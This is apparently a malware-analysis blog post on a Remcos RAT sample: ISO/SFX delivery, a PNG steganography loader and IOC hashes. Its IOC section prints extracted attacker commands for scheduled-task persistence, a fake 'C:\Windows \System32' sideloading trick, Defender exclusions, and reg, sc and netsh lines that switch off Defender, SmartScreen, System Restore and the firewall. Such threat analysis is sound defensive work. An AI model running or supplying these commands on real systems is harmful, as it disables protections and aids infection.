Disclaimer

Friday, January 17, 2020

Remcos RAT Matroska like File execution...

Remcos malware is one active RAT malware nowadays, In this blog I will discuss one interesting sample of Remcos where it use different technique to evade detection, sandbox and many more. The execution flow of this sample is shown in figure 1.

figure 1: remcos execution flow chart

Extraction Stage:

This Remcos malware use .ISO file as a container of its malware file that commonly send through spam or phishing e-mail. The malware is compile with self-file extraction rar (sfxrar) that consist of "Hqspsc.lnk", "Hqspc" folder that contains "Hqsp" (.png file) and "Hqspfhf.exe". 

The  "Hqspsc.lnk" is pointing to the "Hqspfhf.exe"  that will unpack multiple executables and .dll modules in memory upon the execution of it.

figure 2: sfxrar script command

Execution Stage - .PNG Steganography Decryption:

In this stage the "Hqspfhf.exe" will decrypt in memory a .dll module that will locate the encrypted .dll module embedded to the "Hqspc". The decryptor will locate the marker "911..;" to the .png file and then compute the size of the encrypted data to decrypt it.



figure 3: decryptor looking for the marker of the encrypted executable in PNG file.

The embedded encrypted file in .png is a executable container of the Remcos malware. This file container also has some features to evade Windows Defender Anti-Virus by disabling its services, tweaking some of its configuration in registry and many more.

figure 4: embedded executable in PNG file "Hqspc"

figure 4.1: the PNG file contains encrypted executable

figure 5: killing Windows Defender Anti-Virus

Execution Stage - .Decrypting and Loading Remcos RAT:

As soon as the embedded file is decrypted and executed in memory it will decrypt another executable which is the remcos malware that will be executed also in the infected machine.

figure 6: Remcos RAT

Conclusion:

In this Remcos variant we saw how malware author keeps on updating their toolset to evade detection and make their attack a multi-component and embedded multiple executable in a chosen packer container to hide its actual code.

IOC:

sfx file:
sha1:798c17639e6d26a1c343a3ecc956545cf87540e8
md5: ae3063d3ebade140546fd284b2835527
sha256: ba106399e3201a374b6324806ae09f5fa27f86f2c7d85839a4d6146155fc7c73


https://app.any.run/tasks/72547529-e4ec-44d6-9833-081f652dff09
 
Dll module that contains the encrypted Remcos malware and KILL Windows Defender:
sha1: ea5b33762f86345e7a3659323b439ea562237a70
md5: ff3dc3d04bf3f952d0a47007203216c2
sha256: 45700c3753ee5b185d327dd5c8e2d2a1c0221b0aa86c3ad65a1df151a1dff6d0

https://app.any.run/tasks/13a75725-0420-4252-8ffc-f65e3fe700e8

REMCOS RAT:
 sha1: ba9239ee69563d592c30e0e4396f46f705d6e0b4
 md5: b9c247a20b84eed9516cef93dfaa3227
 sha256: d02d91bf556796803905bf9b4d05d4bdc321c2c3776c8c76c32e879f17b17d9a

https://www.virustotal.com/gui/file-analysis/YjljMjQ3YTIwYjg0ZWVkOTUxNmNlZjkzZGZhYTMyMjc6MTU3OTI1Nzk0NQ==/detection

IOC's Command and String:

92740:DVCLAL
92780:AppData
92796:Local
92812:rwe.exe
92828:oet.vbs
92844:_setko.hta
92864:C:\Users\Public\
92904:path = "
92936:WScript.Sleep
92960:<script>
92980:var shell = new ActiveXObject("Shell.Application");
93040:shell.ShellExecute("
93072:","","","open","0");
93104:window.close();
93128:</script>
93140:C:\Users\Public\Clean.bat
93168:C:\Users\Public\SSPICLI.dll
93196:C:\Users\Public\Runex.bat
93224:C:\Users\Public\perfmon.exe
93260:schtasks /Create /SC ONLOGON /TN
93304: /tr "
93320:" /RL HIGHEST
93344:cmd /c md C:\Windows\
93376:del /q "C:\Windows \System32\*"
93416:rmdir "C:\Windows \System32"
93456:rmdir "C:\Windows \"
93488:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath
93664:exit
93672:usax
93680:usa
93692:mkdir "\\?\C:\Windows "
93728:mkdir "\\?\C:\Windows \System32"
93772:copy "C:\Users\Public\perfmon.exe" "C:\Windows \System32\"
93840:copy "C:\Users\Public\SSPICLI.dll" "C:\Windows \System32\"
93908:"C:\Windows \System32\perfmon.exe"
93956:C:\Windows\
93976:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
94032:.bat
94040:rasphone.exe
94064:rasphone.exe
94080:runonce.exe
94100:runonce.exe
94112:svchost.exe
94212:TapiUnattend.exe
94308:schtasks.exe
94400:sxstrace.exe
94488:v.exe
94496:Open
96584:l#@
96652:Error
96660:Runtime error     at 00000000
96692:0123456789ABCDEF

 98844:reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t "REG_DWORD" /d "4" /f
98936:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t "REG_DWORD" /d "0" /f
99048:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t "REG_DWORD" /d "2" /f
99157:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallDay" /t "REG_DWORD" /d "0" /f
99276:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallTime" /t "REG_DWORD" /d "3" /f
99396:reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t "REG_DWORD" /d "4" /f
99491:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
99602:reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t "REG_DWORD" /d "4" /f
99698:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
99811:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
99921:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
100040:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
100156:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
100264:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
100400:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
100536:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
100674:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t "REG_DWORD" /d "0" /f
100786:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t "REG_DWORD" /d "2" /f
100895:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallDay" /t "REG_DWORD" /d "0" /f
101014:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallTime" /t "REG_DWORD" /d "3" /f
101134:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
101249:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
101363:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
101476:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
101586:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
101705:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
101821:Reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /f
102002:Reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
102117:sc stop windefend
102136:sc delete windefend
102157:netsh firewall set opmode disable
102192:netsh advfirewall set  currentprofile state off
102241:net stop wuauserv
102260:REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 4 /f
102347:REG add "HKLM\SYSTEM\CurrentControlSet\services\wscsvc" /v Start /t REG_DWORD /d 4 /f
102434:REG add "HKLM\SYSTEM\CurrentControlSet\services\SENS" /v Start /t REG_DWORD /d 4 /f
102519:reg delete hkcu\Environment /v windir /f

 


"Reg Restore" Odyssey: Journey to Persistence And Evasion

The Windows Registry, a fundamental component of the Windows Operating System, empowers users to fine-tune system policies and manipulate lo...